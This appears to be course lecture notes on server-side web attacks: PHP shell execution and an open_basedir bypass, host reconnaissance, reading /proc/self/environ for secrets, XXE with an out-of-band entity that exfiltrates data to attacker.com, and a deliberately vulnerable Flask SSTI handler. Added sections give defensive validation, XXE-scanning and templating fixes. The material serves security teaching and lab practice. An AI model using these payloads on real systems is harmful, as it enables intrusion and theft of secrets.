Server Side Attacks

sean

PHP

#PHP is a great language

Interactive shell

php > $a = "phpinfo";
php > $a();
phpinfo()
PHP Version => 7.1.16

System => Darwin devoops.local 17.4.0 Darwin Kernel Version 17.4.0: Sun Dec 17 09:19:54 PST 2017; root:xnu-4570.41.2~1/RELEASE_X86_64 x86_64

Direct execution

People love using exec to be lazy. Common things to look for:

  • Directory listings
  • Network utilities
    • Ping -> ping $ip
    • Traceroute -> traceroute $ip
    • Whois -> whois $domain
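
The wrappers above are usually one string concatenation away from command injection: whatever lands in $ip or $domain is parsed by the shell. The example below is added here and is not code from the original post; it is written in Python rather than PHP to show the two defensive moves that apply to either language: validate the target as an IP address or hostname, and pass arguments as an argv list so no shell ever sees them (the PHP counterpart of shlex.quote() is escapeshellarg()). All function names are hypothetical.

```python
# Added example (not from the original post): the ping/traceroute/whois
# wrappers listed above, written the injectable way and the safe way.
# Function names (vulnerable_command, build_argv, ...) are hypothetical.
import ipaddress
import re
import shlex
import subprocess
from typing import List

# RFC 1123-style hostname: labels of 1-63 alphanumerics/hyphens, no leading or
# trailing hyphen, 253 chars total. Nothing a shell cares about can pass this.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)

# Allowlist of tools and their fixed options; the user only supplies the target.
_TOOLS = {
    "ping": ["ping", "-c", "1"],
    "traceroute": ["traceroute"],
    "whois": ["whois"],
}


def vulnerable_command(user_ip: str) -> str:
    """The pattern the post warns about: user input spliced into a shell
    string (PHP: exec("ping $ip")). Returned, not run, so it can be inspected."""
    return f"ping -c 1 {user_ip}"


def is_ip(value: str) -> bool:
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False


def is_hostname(value: str) -> bool:
    return bool(_HOSTNAME_RE.match(value))


def build_argv(tool: str, target: str) -> List[str]:
    """Validate both the tool and the target, then return an argv list.
    subprocess runs an argv list without a shell, so ';', '|', '$(...)' and
    backticks in `target` would reach ping as literal bytes (and are rejected
    by validation before that anyway)."""
    if tool not in _TOOLS:
        raise ValueError(f"tool not allowed: {tool!r}")
    if not (is_ip(target) or is_hostname(target)):
        raise ValueError(f"target is not an IP address or hostname: {target!r}")
    return _TOOLS[tool] + [target]


def run_tool(tool: str, target: str, timeout: float = 10.0) -> str:
    """Run the validated command with a timeout; stdout is returned as text."""
    result = subprocess.run(
        build_argv(tool, target), capture_output=True, text=True,
        timeout=timeout, check=False,
    )
    return result.stdout


def quoted_for_shell(target: str) -> str:
    """If a shell string truly cannot be avoided, quote the argument. This is
    the Python counterpart of PHP's escapeshellarg(); validation still comes first."""
    return shlex.quote(target)


if __name__ == "__main__":
    print(vulnerable_command("8.8.8.8; id"))   # the string a shell would happily run
    print(build_argv("ping", "8.8.8.8"))
    print(quoted_for_shell("8.8.8.8; id"))
    try:
        build_argv("ping", "8.8.8.8; id")
    except ValueError as exc:
        print("rejected:", exc)
```

run_tool() is the only function that touches the system; everything else is pure, so the validation rules can be unit-tested without a network.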

Execute commands through exec/system

> php -a
Interactive shell

php > echo exec('ls');
z.sh

exec() returns only the last line of output as its return value; the full output goes into the optional $output array:

string exec ( string $command [, array &$output [, int &$return_var ]] )

Alternative to exec is system:

> php -a
Interactive shell

php > echo system('ls');
Applications
Desktop
Documents
Downloads
IMG_1508.jpg
IdeaProjects
Latest_Tunnelblick_Stable.dmg
Library
Movies

exec() disabled? Don't worry, PHP has you covered!

> php -a
Interactive shell

php > echo passthru('ls -la');
total 41368
drwxr-xr-x+ 107 carey  staff      3424  2 May 10:45 .
drwxr-xr-x    6 root   admin       192 13 Mar 02:10 ..
drwx------    3 carey  staff        96  7 Mar 12:24 .BurpSuite
-r--------    1 carey  staff         7  7 Mar 01:03 .CFUserTextEncoding
-rw-r--r--@   1 carey  staff     18436  2 May 12:37 .DS_Store
drwx------   30 carey  staff       960 27 Apr 15:14 .Trash
drwxr-xr-x    2 carey  staff        64 21 Mar 09:58 .android

Also: backticks (PHP's shell_exec() operator) run shell commands

> php -a
Interactive shell

php > echo `ls -la`;
total 41368
drwxr-xr-x+ 107 carey  staff      3424  2 May 10:45 .
drwxr-xr-x    6 root   admin       192 13 Mar 02:10 ..
drwx------    3 carey  staff        96  7 Mar 12:24 .BurpSuite
-r--------    1 carey  staff         7  7 Mar 01:03 .CFUserTextEncoding
-rw-r--r--@   1 carey  staff     18436  2 May 12:28 .DS_Store
drwx------   30 carey  staff       960 27 Apr 15:14 .Trash
drwxr-xr-x    2 carey  staff        64 21 Mar 09:58 .android
-rw-------    1 carey  staff      8783 29 Apr 13:27 .bash_history
-rw-r--r--    1 carey  staff      2756 27 Apr 14:06 .bash_profile

Why is this useful? You now have arbitrary non-PHP code execution: anything the OS can run, PHP can run for you.

Exhibit 1: Bypassing open_basedir

open_basedir restricts PHP's file functions to a given directory tree: file functions fail when they touch paths outside the open_basedir directory. However, open_basedir restrictions are not applied to code run through exec() and friends, so the shell reads whatever the web server's user can.

> php -a
Interactive shell

php > ini_set('open_basedir', '/tmp');
php > echo file_get_contents('/etc/hosts');
PHP Warning:  file_get_contents(): open_basedir restriction in effect. File(/etc/hosts) is not within the allowed path(s): (/tmp) in php shell code on line 1

Warning: file_get_contents(): open_basedir restriction in effect. File(/etc/hosts) is not within the allowed path(s): (/tmp) in php shell code on line 1
PHP Warning:  file_get_contents(/etc/hosts): failed to open stream: Operation not permitted in php shell code on line 1

Warning: file_get_contents(/etc/hosts): failed to open stream: Operation not permitted in php shell code on line 1
php > echo `cat /etc/hosts`;
##
# Host Database
#
# localhost is used to configure the loopback interface
# when the system is booting.  Do not change this entry.
##
127.0.0.1	localhost
255.255.255.255	broadcasthost
::1             localhost

# CS6443
172.16.96.128	yipple.ns.agency.dev
172.16.96.128   uvm.local

127.0.0.1 cspdomain2
127.0.0.1 lol

Exhibit 2: What's listening on this host?

Knowing your way around the standard Linux utilities is another important thing.

>>> php -a
Interactive mode enabled

php > echo `netstat -tulpn`;
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:587           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:36205           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:52205           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:59565           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.1.1:53            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -

Exhibit 2.5: Dump the contents of your ARP cache

Useful for discovering what hosts your compromised box knows.

php > echo `arp -n`;
Address                  HWtype  HWaddress           Flags Mask            Iface
172.16.96.1              ether   00:50:56:c0:00:08   C                     ens33
172.16.96.2              ether   00:50:56:fd:f0:2d   C                     ens33
172.16.96.254            ether   00:50:56:ed:67:6c   C                     ens33

Exhibit 2.75: Get environment variables

Useful for stealing deployment secrets (Flask secrets, etc.).

php > echo `cat /proc/self/environ`;
MAIL=/var/mail/carey
SSH_CLIENT=172.16.96.1 49803 22
USER=carey
SHLVL=1
HOME=/home/carey
SSH_TTY=/dev/pts/8
PS1=\[\]\u@\[\]\[\]\h \[\]in \[\]\w\[\]$([[ -n $(git branch 2> /dev/null) ]] && echo " on ")\[\]$(parse_git_branch)\[\]\n>>> \[\]PS2=\[\]→ \[\]
QT_QPA_PLATFORMTHEME=appmenu-qt5
LOGNAME=carey
_=/usr/bin/php
XDG_SESSION_ID=295
TERM=xterm-256color
BOLD=
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
RESET=XDG_RUNTIME_DIR=/run/user/1000GREEN=LANG=en_US.UTF-8
MAGENTA=SSH_AUTH_SOCK=/tmp/ssh-EhuI5t5bRB/agent.89949SHELL=/bin/bash
PROMPT_COMMAND=echo -ne "\033]0;${PWD##*/}\007"
_z --add "$(command pwd -P 2>/dev/null)" 2>/dev/null;
ORANGE=
PWD=/home/carey
XDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/desktop
SSH_CONNECTION=172.16.96.1 49803 172.16.96.128 22
PURPLE=

XML XXE

What you covered in your lecture basically, except now with more XML.

Disclaimer: These images are stolen from 6843 lecture slides

Exhibit 3: Including files from XXE

The tricks above (stealing environment variables, reading arbitrary files, etc.) apply here too.

[image: sample_xxe]

Exhibit 4: When you can't include payloads directly, why not include remotely?

[image: remote_xxe_1]

Meanwhile at http://sean.local:8000/

[image: remote_xxe_2]

Exhibit 5: When you can't get output from your XXE directly

[image: oob_xxe]

Fun tricks for OOB XXE

If a local firewall blocks outbound ports 80 and 443 from the internal network, you can exfiltrate over DNS instead. You'll probably need a way to split the data up and base64-encode it so the domain isn't overly long and doesn't break the URL (see https://tools.ietf.org/html/rfc3986 for the syntax).

<!ENTITY % all "<!ENTITY send SYSTEM 'http://%file.attacker.com'>">
%all;
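
Every variant in Exhibits 3 to 5, including the DNS trick above, depends on DTD features the application never needed: external entities, parameter entities, and external DTDs. The defensive rule is therefore simple: untrusted XML carries no DOCTYPE at all. The example below is added here and is not code from the post or the lecture slides; it uses only the Python standard library (expat's declaration callbacks) to inspect a document and refuse it before the real parser runs. The sample documents are constructed, the attacker host name is a placeholder, and the function names are hypothetical.

```python
# Added example (not from the original post or the lecture slides): a
# pre-parse check that refuses the DOCTYPE constructs every XXE variant shown
# above needs, before the document reaches the real parser. Standard library
# only; function names are hypothetical.
import xml.etree.ElementTree as ET
import xml.parsers.expat as expat
from typing import List


def scan_for_xxe(data: bytes) -> List[str]:
    """Return findings describing DTD constructs in the document. An empty
    list means there is no DOCTYPE, and therefore nothing to expand."""
    findings: List[str] = []

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Any DOCTYPE is a finding: internal entities alone allow expansion DoS.
        findings.append(f"DOCTYPE declared: {name}")
        if system_id or public_id:
            findings.append(f"external DTD referenced: {system_id or public_id}")

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        kind = "parameter entity" if is_param else "entity"
        if system_id or public_id:
            # file://, http://, or a host name carrying data, as in the OOB trick
            findings.append(f"external {kind} {name!r} -> {system_id or public_id}")
        elif is_param:
            # internal parameter entities exist only to assemble further declarations
            findings.append(f"internal {kind} {name!r}")
        elif value is not None and "<!ENTITY" in value:
            findings.append(f"entity {name!r} declares nested entities")

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(data, True)
    except expat.ExpatError as exc:
        # Declarations seen before the error are already recorded; a document
        # that does not parse is rejected rather than guessed about.
        findings.append(f"not well-formed: {exc}")
    return findings


def parse_untrusted(data: bytes) -> ET.Element:
    """Parse only after the scan comes back clean. Python's expat does not
    fetch external entities unless a handler is installed, but failing closed
    keeps the policy simple and also covers internal entity expansion."""
    findings = scan_for_xxe(data)
    if findings:
        raise ValueError("rejected XML: " + "; ".join(findings))
    return ET.fromstring(data)


# Constructed samples, not captured traffic; attacker.example is a placeholder.
BENIGN = b"<order><item sku='A1'>2</item></order>"

FILE_XXE = b"""<?xml version="1.0"?>
<!DOCTYPE data [ <!ENTITY xxe SYSTEM "file:///etc/hosts"> ]>
<data>&xxe;</data>"""

OOB_XXE = b"""<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY % file SYSTEM "file:///etc/hostname">
  <!ENTITY % dtd SYSTEM "http://attacker.example/evil.dtd">
  %dtd;
]>
<data>x</data>"""

if __name__ == "__main__":
    for label, doc in [("benign", BENIGN), ("file", FILE_XXE), ("oob", OOB_XXE)]:
        print(label, scan_for_xxe(doc))
```

The findings list is worth logging as-is: the system identifiers it captures (the file path, the DTD URL, the host name used for DNS exfiltration) are exactly the indicators a detection team wants from a blocked request.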

Extended break challenges for XXE

https://7xxxxxxxml.redline.eu.ns.agency/
https://8xxxxxxxxml.redline.jp.ns.agency/

Python

I'm running out of time writing this so I'll be brief lol.

Python is a relatively sane language (and isn't primarily a web language, so this section is slightly too general), so this section will be blank.

Flask (Jinja)

Jinja is relatively safe, until people do dumb things like render strings as {{ var | safe }}, which leads to XSS. However, another bad thing we can do is render user-supplied strings as templates:

#!/usr/bin/env python
from flask import render_template_string, request
import re
from . import app  # the Flask app object defined in the package's __init__

# request.form is only populated on POST, so the route must accept it
@app.route('/test', methods=['GET', 'POST'])
def test():
    # default to '' so a missing User-Agent header doesn't make re.match() raise
    if re.match(r'[Cc]url.*', request.headers.get('User-Agent', '')):
        return render_template_string("you are curl")

    # Blindly bad example of how to do SSTI: the user's input *is* the template
    return render_template_string(request.form['input'])

Now that user controlled input is being passed as a template, we can do fun things:

[image: Screen-Shot-2018-05-02-at-2.53.15-pm]

Once you can get to a reference to an Object, you can do whatever you want (mostly).

[image: Screen-Shot-2018-05-02-at-2.59.26-pm]

Good read: https://0day.work/jinja2-template-injection-filter-bypasses/
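
To make the fix concrete, here is the vulnerable pattern from the Flask handler above next to the corrected form, reduced to the underlying Jinja calls so it runs without Flask. This is an added example, not code from the original post; it assumes the jinja2 package is installed, and the function names are hypothetical. The difference is not which filter you apply but which string is the template: the developer's constant, with user input passed in as a variable.

```python
# Added example, not code from the original post: the vulnerable pattern from
# the Flask handler above next to the fix, reduced to the Jinja calls so it
# runs without Flask. Assumes jinja2 is installed; function names are hypothetical.
from jinja2 import Environment

# One environment with autoescaping on: variable values are HTML-escaped on output.
env = Environment(autoescape=True)


def render_vulnerable(user_input: str) -> str:
    """What render_template_string(request.form['input']) does underneath: the
    user string *is* the template, so any {{ ... }} inside it is evaluated."""
    return env.from_string(user_input).render()


def render_fixed(user_input: str) -> str:
    """The template is a constant written by the developer; user input is only
    ever a variable. Jinja syntax inside the value is plain text, and
    autoescaping takes care of the XSS half the post mentions."""
    return env.from_string("<p>{{ value }}</p>").render(value=user_input)


def looks_like_ssti_probe(user_input: str) -> bool:
    """A cheap log/WAF heuristic for {{7*7}}-style probes; a detection aid,
    not a substitute for render_fixed()."""
    return "{{" in user_input or "{%" in user_input


if __name__ == "__main__":
    probe = "{{ 7 * 7 }}"
    print(render_vulnerable(probe))   # 49: the expression was evaluated
    print(render_fixed(probe))        # <p>{{ 7 * 7 }}</p>: treated as text
    print(render_fixed("<script>"))   # <p>&lt;script&gt;</p>
```

The arithmetic probe is the standard first test for this bug class in both directions: an attacker uses it to confirm evaluation, and a reviewer can use it as a regression test that render_fixed() never evaluates input.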

Things to try

http://websec.fr/level05/index.php - PHP code injection for maximum lol

Sy extra special trolling

http://ssti.lecture.ns.agency/

  • Shell exec. Flag at /

http://xml.lecture.ns.agency/

  • SSRF. Flag on internal host pivot

http://logfile.lecture.ns.agency/

  • Shell exec. Flag at /